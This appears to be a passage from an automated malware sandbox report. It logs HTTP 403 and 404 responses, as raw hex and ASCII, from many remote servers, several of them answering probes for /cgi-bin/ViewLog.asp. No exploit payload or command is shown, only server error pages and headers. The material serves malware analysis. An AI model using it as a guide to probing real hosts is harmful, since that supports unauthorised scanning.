          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 13 Nov 2023 21:18:59 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:18:59 GMTServer: Apache/2.4.37 (Win32) OpenSSL/1.0.2p PHP/5.6.40Vary: accept-language,accept-charsetContent-Length: 439Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Nov 2023 02:19:00 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 22:27:22 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Mon, 13 Nov 2023 21:19:04 GMTServer: lighttpd/1.4.45Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: PsiOcppAppConnection: keep-aliveDate:Mon, 13 Nov 2023 18:39:20 GMTContent-Length: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:19:15 GMTConnection: Close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Nov 2023 00:49:26 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Mon, 13 Nov 2023 21:19:19 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nPerf/2.2.7 2022-10-14Connection: closeContent-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 3c 2f 70 3e 3c 70 3e 6e 50 65 72 66 53 65 72 76 65 72 20 76 32 2e 32 2e 37 20 32 30 32 32 2d 31 30 2d 31 34 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.<br /></p><p>nPerfServer v2.2.7 2022-10-14</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Nov 2023 01:19:26 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Length: 74Content-Type: text/htmlDate: Mon, 13 Nov 2023 21:19:33 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error</title></head><body>404 - Not Found</body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Nov 2023 21:19:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Nov 2023 21:19:33 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/8.0.30Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://94.16.107.205:8080/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 35 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 64 65 6d 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 64 65 6d 6f 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 64 65 6d 6f 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 39 34 2e 31 36 2e 31 30 37 2e 32 30 35 3a 38 30 38 30 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Mon, 13 Nov 2023 21:19:33 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Nov 2023 21:19:36 GMTServer: serverX-XSS-Protection: 1; mode=blockReferrer-Policy: strict-origin-when-cross-originX-Frame-Options: SameOriginX-Content-Type-Options: nosniffContent-Length: 402Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 73 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>server Server at 192.168.0.14 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nPerf/2.2.7 2022-10-14Connection: closeContent-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 3c 2f 70 3e 3c 70 3e 6e 50 65 72 66 53 65 72 76 65 72 20 76 32 2e 32 2e 37 20 32 30 32 32 2d 31 30 2d 31 34 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.<br /></p><p>nPerfServer v2.2.7 2022-10-14</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 767Date: Mon, 13 Nov 2023 21:19:46 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 